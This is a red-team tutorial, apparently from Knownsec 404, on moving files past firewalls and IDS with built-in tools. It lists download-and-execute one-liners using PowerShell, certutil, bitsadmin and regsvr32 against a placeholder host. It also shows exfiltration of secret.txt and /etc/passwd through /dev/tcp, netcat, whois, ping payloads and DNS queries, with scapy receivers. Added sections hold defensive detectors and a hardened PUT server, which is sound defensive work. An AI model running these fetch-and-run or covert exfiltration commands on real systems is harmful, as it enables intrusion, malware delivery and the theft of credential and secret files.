Summary: In red team penetration tests it is often necessary to make the most of the current environment and transfer files past the firewalls, IDS, IPS and other alerting and monitoring systems of a heavily defended target. This article lists several ways to transfer files using only tools that ship with the operating system.
Author: xax007 @ Knownsec 404 ScanV security services team
Author's blog: https://xax007.github.io/
In red team penetration tests it is often necessary to make the most of the current environment and transfer files past the firewalls, IDS, IPS and other alerting and monitoring systems of a heavily defended target. This article lists several ways to transfer files using only tools that ship with the operating system.
Setting up an HTTP server
Python
python2:
python -m SimpleHTTPServer 1337
The command above starts an HTTP server in the current directory on port 1337.
python3:
python -m http.server 1337
The command above starts an HTTP server in the current directory on port 1337.
PHP 5.4+
When the PHP version is 5.4 or later, PHP itself can start an HTTP server in the current directory on port 1337:
php -S 0.0.0.0:1337
Ruby
The following command starts an HTTP server in the current directory on port 1337:
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'
Ruby 1.9.2+
ruby -run -e httpd . -p 1337
Perl
perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'
perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 ? "./$1 |" : $1) if /^GET \/(.*) / })'
Thanks to: http://stackoverflow.com/questions/8058793/single-line-python-webserver
busybox httpd
busybox httpd -f -p 8000
Contributed by: lvm
Download files from HTTP server
Below are several ways to download a file from an HTTP server on Windows and Linux using tools that ship with the system.
Windows
powershell
Download and execute:
powershell (new-object System.Net.WebClient).DownloadFile('http://1.2.3.4/5.exe','c:\download\a.exe');start-process 'c:\download\a.exe'
certutil
Download and execute:
certutil -urlcache -split -f http://1.2.3.4/5.exe c:\download\a.exe&&c:\download\a.exe
bitsadmin
Download and execute:
bitsadmin /transfer n http://1.2.3.4/5.exe c:\download\a.exe && c:\download\a.exe
bitsadmin downloads are relatively slow.
regsvr32
regsvr32 /u /s /i:http://1.2.3.4/5.exe scrobj.dll
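As an added example that is not part of the original article, the following Python script shows how a defender can flag the four download-and-execute idioms listed above in process-creation telemetry. The log line format, host names, user names and file paths are constructed for the demonstration; the command lines are the ones from this section, plus two benign uses of the same binaries that must not match.

```python
import re

# Constructed sample process-creation events (not from the article). Each line is
# "timestamp host user image command_line", a simplified EDR/Sysmon-style export.
SAMPLE_EVENTS = [
    "2024-01-01T10:00:01 WS01 alice C:\\Windows\\System32\\certutil.exe certutil -urlcache -split -f http://1.2.3.4/5.exe c:\\download\\a.exe",
    "2024-01-01T10:00:05 WS01 alice C:\\Windows\\System32\\bitsadmin.exe bitsadmin /transfer n http://1.2.3.4/5.exe c:\\download\\a.exe && c:\\download\\a.exe",
    "2024-01-01T10:00:09 WS01 alice C:\\Windows\\System32\\regsvr32.exe regsvr32 /u /s /i:http://1.2.3.4/5.exe scrobj.dll",
    "2024-01-01T10:00:12 WS01 alice C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('http://1.2.3.4/5.exe','c:\\download\\a.exe');start-process 'c:\\download\\a.exe'",
    # Benign uses of the same binaries: hashing a local file, registering a local DLL.
    "2024-01-01T10:01:00 WS01 alice C:\\Windows\\System32\\certutil.exe certutil -hashfile c:\\tools\\a.exe SHA256",
    "2024-01-01T10:02:00 WS01 alice C:\\Windows\\System32\\regsvr32.exe regsvr32 /s c:\\program files\\vendor\\comp.dll",
]

# Each rule: (name, image regex, command-line regex). The command-line patterns
# describe the download idioms from the section above; requiring a URL keeps the
# ordinary local uses of certutil and regsvr32 from matching.
RULES = [
    ("certutil_urlcache_download", r"certutil\.exe$", r"(?i)-urlcache\b.*\s-f\s.*https?://"),
    ("bitsadmin_transfer_download", r"bitsadmin\.exe$", r"(?i)/transfer\b.*https?://"),
    ("regsvr32_remote_scriptlet", r"regsvr32\.exe$", r"(?i)/i:https?://.*scrobj\.dll"),
    ("powershell_webclient_download", r"powershell\.exe$", r"(?i)Net\.WebClient\b.*DownloadFile\("),
]


def parse_event(line):
    """Split one constructed log line into its five fields; the command line keeps its spaces."""
    ts, host, user, image, cmdline = line.split(" ", 4)
    return {"ts": ts, "host": host, "user": user, "image": image, "cmdline": cmdline}


def match_rules(event):
    """Return the names of every rule whose image and command-line patterns both match."""
    hits = []
    for name, image_re, cmd_re in RULES:
        if re.search(image_re, event["image"], re.IGNORECASE) and re.search(cmd_re, event["cmdline"]):
            hits.append(name)
    return hits


def scan(lines):
    """Run every rule over every line and return (timestamp, host, rule) alert tuples."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        for rule in match_rules(ev):
            alerts.append((ev["ts"], ev["host"], rule))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Matching on both the image path and the command line matters: the URL requirement is what separates `certutil -urlcache -f http://...` from a routine `certutil -hashfile`, and the same binary name alone would drown an analyst in false positives.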
Linux
Curl
curl http://1.2.3.4/backdoor
Wget
wget http://1.2.3.4/backdoor
awk
To download a file with awk, first start an HTTP server with any of the commands listed above. The /inet/tcp special file is a gawk feature:
```awk
awk 'BEGIN {
  RS = ORS = "\r\n"
  HTTPCon = "/inet/tcp/0/127.0.0.1/1337"
  print "GET /secret.txt HTTP/1.1\r\nConnection: close\r\n" |& HTTPCon
  while (HTTPCon |& getline > 0)
    print $0
  close(HTTPCon)
}'
```
Result:
Setup HTTP PUT server
Below are several ways to upload a file to an HTTP server.
Setting up an HTTP PUT server with Nginx
```bash
mkdir -p /var/www/upload/                  # create the upload directory
chown www-data:www-data /var/www/upload/   # set its owner and group
cd /etc/nginx/sites-available              # enter the nginx virtual host directory
# write the configuration to the file_upload file
cat <<EOF > file_upload
server {
    listen 8001 default_server;
    server_name kali;
    location / {
        root /var/www/upload;
        dav_methods PUT;
    }
}
EOF
# configuration written
cd ../sites-enabled                        # enter the directory of enabled virtual hosts
ln -s /etc/nginx/sites-available/file_upload file_upload   # enable the file_upload virtual host
systemctl start nginx                      # start Nginx
```
Setting up an HTTP PUT server with Python
Save the following code to a file named HTTPutServer.py:
```python
# ref: https://www.snip2code.com/Snippet/905666/Python-HTTP-PUT-test-server
import sys
import signal
from threading import Thread
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler


class PUTHandler(BaseHTTPRequestHandler):
    def do_PUT(self):
        # read exactly Content-Length bytes of body and store them under the request path
        length = int(self.headers['Content-Length'])
        content = self.rfile.read(length)
        self.send_response(200)
        self.end_headers()  # terminate the response headers so the client does not wait for EOF
        with open(self.path[1:], "w") as f:
            f.write(content)


def run_on(port):
    print("Starting an HTTP PUT Server on {0} port {1} (http://{0}:{1}) ...".format(sys.argv[1], port))
    server_address = (sys.argv[1], port)
    httpd = HTTPServer(server_address, PUTHandler)
    httpd.serve_forever()


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage:\n\tpython {0} ip 1337".format(sys.argv[0]))
        sys.exit(1)
    ports = [int(arg) for arg in sys.argv[2:]]
    try:
        for port_number in ports:
            server = Thread(target=run_on, args=[port_number])
            server.daemon = True  # Do not make us wait for you to exit
            server.start()
        signal.pause()  # Wait for interrupt signal, e.g. KeyboardInterrupt
    except KeyboardInterrupt:
        print("\nPython HTTP PUT Server Stopped.")
        sys.exit(1)
```
Usage:
```
$ python HTTPutServer.py 10.10.10.100 1337
Starting an HTTP PUT Server on 10.10.10.100 port 1337 (http://10.10.10.100:1337) ...
```
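The handler above writes to whatever path the client names (`self.path[1:]`), so a request such as `PUT /../../some/file` lands outside the upload directory, and it accepts a body of any size. As an added example that is not part of the original article, here is a Python 3 equivalent that confines writes to one directory and caps the body; the 10 MiB limit, the `demo()` helper, the ephemeral-port binding and the temporary-directory setup are constructed choices for this demonstration.

```python
import os
import tempfile
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer

MAX_UPLOAD = 10 * 1024 * 1024  # constructed limit: refuse bodies larger than 10 MiB


def safe_target(root, url_path):
    """Map a request path onto a file below root.

    Returns the absolute target path, or None when the request names root itself
    or would escape it (e.g. PUT /../escape.txt). Both sides are resolved with
    realpath so symlinks cannot be used to sidestep the comparison.
    """
    real_root = os.path.realpath(root)
    rel = url_path.split("?", 1)[0].lstrip("/")
    if not rel:
        return None
    candidate = os.path.realpath(os.path.join(real_root, rel))
    if candidate == real_root or os.path.commonpath([real_root, candidate]) != real_root:
        return None
    return candidate


class SafePUTHandler(BaseHTTPRequestHandler):
    upload_root = "."  # overridden per server instance by make_server()

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", "0"))
        if length < 0 or length > MAX_UPLOAD:
            self._reply(413)
            return
        content = self.rfile.read(length)  # drain the body before answering
        target = safe_target(self.upload_root, self.path)
        if target is None:
            self._reply(403)
            return
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with open(target, "wb") as f:
            f.write(content)
        self._reply(201)

    def _reply(self, code):
        self.send_response(code)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep the demo silent; a real deployment would log every PUT


def make_server(root, host="127.0.0.1", port=0):
    """Build an HTTPServer whose handler is bound to one upload directory."""
    handler = type("BoundPUTHandler", (SafePUTHandler,), {"upload_root": root})
    return HTTPServer((host, port), handler)


def put(port, path, body):
    """Send one PUT to the local demo server and return the HTTP status."""
    conn = HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("PUT", path, body=body)
    status = conn.getresponse().status
    conn.close()
    return status


def demo():
    """Start the server on an ephemeral port, then try a normal and a traversal PUT."""
    root = tempfile.mkdtemp()
    srv = make_server(root)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    port = srv.server_address[1]
    results = {
        "ok": put(port, "/secret.txt", b"hello"),
        "traversal": put(port, "/../escape.txt", b"nope"),
    }
    srv.shutdown()
    srv.server_close()
    with open(os.path.join(root, "secret.txt"), "rb") as f:
        results["stored"] = f.read()
    results["escaped"] = os.path.exists(os.path.join(os.path.dirname(root), "escape.txt"))
    return results


if __name__ == "__main__":
    print(demo())
```

The check is done on resolved paths rather than by searching the request for `..`, because encoded or symlink-based variants of the same escape would slip past a string match but not past `realpath` plus `commonpath`.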
Uploading files to the HTTP PUT server
Linux
Curl
$ curl --upload-file secret.txt http://ip:port/
Wget
$ wget --method=PUT --body-file=secret.txt http://ip:port/
Windows
Powershell
```powershell
$body = Get-Content secret.txt -Raw   # -Raw keeps the file as one string instead of an array of lines
Invoke-RestMethod -Uri http://ip:port/secret.txt -Method PUT -Body $body
```
File transfer with Bash /dev/tcp
A listener must be started first.
Receiving end:
nc -lvnp 1337 > secret.txt
Sending end:
cat secret.txt > /dev/tcp/ip/port
File transfer over SMB
Setting up a simple SMB server
Setting up a simple SMB server requires the smbserver.py file from the Impacket project. Impacket is installed by default on Kali Linux.
syntax: impacket-smbserver ShareName SharePath
```bash
$ mkdir smb                         # create the smb directory
$ cd smb                            # enter the smb directory
$ impacket-smbserver share `pwd`    # start an SMB server in the current directory with share name "share"
```
Result:
Downloading files from the SMB server
copy \\IP\ShareName\file.exe file.exe
Uploading files to the SMB server
```
net use x: \\IP\ShareName
copy file.txt x:
net use x: /delete
```
File transfer with the whois command
(Diagram: /etc/passwd is sent from Host A to Host B)
Receiving end, Host B:
nc -vlnp 1337 | sed "s/ //g" | base64 -d
Sending end, Host A:
whois -h 127.0.0.1 -p 1337 `cat /etc/passwd | base64`
Result:
File transfer with the ping command
(Diagram: secret.txt is sent from Sender to Receiver)
Sending end:
xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done
Receiving end:
Save the following code to ping_receiver.py:
```python
import sys
try:
    from scapy.all import *
except ImportError:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(0)


def process_packet(pkt):
    # Echo requests (type 8) carry the sender's 4-byte chunk repeated across the
    # payload; the last 4 bytes are one complete copy of it.
    if pkt.haslayer(ICMP):
        if pkt[ICMP].type == 8:
            data = pkt[ICMP].load[-4:]
            print(f'{data.decode("utf-8")}', flush=True, end="", sep="")


sniff(iface="eth0", prn=process_packet)
```
Usage:
python3 ping_receiver.py
Result:
File transfer with the dig command
(Diagram: /etc/passwd is sent from Sender to Receiver)
Sending end:
xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done
Receiving end:
The code below uses Python's scapy module, which must be installed manually. Save the code to a file named dns_reciver.py:
```python
import sys
try:
    from scapy.all import *
except ImportError:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(0)


def process_packet(pkt):
    # Only handle queries (qr == 0): a response repeats the question section and
    # would print every chunk a second time.
    if pkt.haslayer(DNS) and pkt[DNS].qr == 0 and pkt.haslayer(DNSQR):
        domain = pkt[DNS][DNSQR].qname.decode('utf-8')
        root_domain = domain.split('.')[1]
        if root_domain.startswith('gooogle'):
            # drop the trailing ".gooogle.com." (13 characters) and decode the hex chunk
            print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}', flush=True, end='')


sniff(iface="eth0", prn=process_packet)
```
Usage:
python3 dns_reciver.py
Result:
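Seen from the resolver, the dig-based channel above is a burst of queries from one client whose leftmost label is a long hex string under a single parent domain. As an added example that is not code from the article, the following Python script flags such queries in a resolver query log and reassembles the carried bytes for the analyst. The log line format, the client addresses, the 20-character label threshold and the sample /etc/passwd lines are constructed for the demonstration; only the gooogle.com parent domain and the 31-byte chunk size come from the section above.

```python
import re
from collections import defaultdict

# Constructed sample data (not from the article): two /etc/passwd-style lines,
# split exactly as the sender's "xxd -p -c 31" would, one query per chunk.
SAMPLE_PASSWD = (b"root:x:0:0:root:/root:/bin/bash\n"
                 b"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")
CHUNK = 31
EXFIL_QUERIES = [
    "10:00:01 172.16.1.50 %s.gooogle.com A" % SAMPLE_PASSWD[i:i + CHUNK].hex()
    for i in range(0, len(SAMPLE_PASSWD), CHUNK)
]
# Constructed benign lookups that must not be flagged, including a short hex-looking label.
BENIGN_QUERIES = [
    "10:00:02 172.16.1.51 www.example.com A",
    "10:00:03 172.16.1.51 mail.example.com MX",
    "10:00:04 172.16.1.52 a1b2c3.cdn.example.net A",
]
SAMPLE_QUERIES = EXFIL_QUERIES + BENIGN_QUERIES

# A leftmost label of 20 or more hex characters with even length is the channel's
# signature; 20 is a constructed tuning threshold, not a number from the article.
HEX_LABEL = re.compile(r"^[0-9a-f]{20,}$")


def parse_query(line):
    """Parse a constructed 'time client qname qtype' resolver log line."""
    ts, client, qname, qtype = line.split()
    return {"ts": ts, "client": client, "qname": qname.lower().rstrip("."), "qtype": qtype}


def is_hex_label(label):
    return len(label) % 2 == 0 and HEX_LABEL.match(label) is not None


def suspicious_queries(lines):
    """Return the parsed queries whose leftmost label is a long hex string, with
    the parent domain and the decoded bytes attached for the analyst."""
    hits = []
    for line in lines:
        q = parse_query(line)
        labels = q["qname"].split(".")
        if is_hex_label(labels[0]):
            q["parent"] = ".".join(labels[1:])
            q["decoded"] = bytes.fromhex(labels[0])
            hits.append(q)
    return hits


def queries_per_channel(hits):
    """Count flagged queries per (client, parent domain): one client emitting many
    distinct hex labels under a single parent is the pattern to alert on."""
    counts = defaultdict(int)
    for q in hits:
        counts[(q["client"], q["parent"])] += 1
    return dict(counts)


def reassemble(hits, client, parent):
    """Concatenate the decoded chunks of one channel in log order."""
    return b"".join(q["decoded"] for q in hits
                    if q["client"] == client and q["parent"] == parent)


if __name__ == "__main__":
    hits = suspicious_queries(SAMPLE_QUERIES)
    for (client, parent), n in queries_per_channel(hits).items():
        print("%s -> %s: %d suspicious queries" % (client, parent, n))
        print(reassemble(hits, client, parent).decode())
```

Counting per (client, parent domain) rather than alerting on single queries is the useful part: a lone hex-looking label appears in legitimate CDN and tracking names, but dozens of distinct ones under one parent from one host within seconds do not.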
File transfer with NetCat
(Diagram: 1.txt is transferred between A (10.10.10.100) and B (10.10.10.200))
Receiving end:
nc -l -p 1337 > 1.txt
Sending end:
cat 1.txt | nc -l -p 1337
or
nc 10.10.10.200 1337 < 1.txt
In extreme cases, when the receiving end has no nc, Bash's /dev/tcp can be used to receive the file:
cat < /dev/tcp/10.10.10.200/1337 > 1.txt
References
- Ippsec's HackTheBox - Mischief video
- Micropoor
- Simple Local HTTP Server With Ruby
- Big list of http static server one liners
- Penetration tips: several ways to download files from GitHub
This article was published by Seebug Paper; please credit the source when reprinting. Original URL: https://paper.seebug.org/834/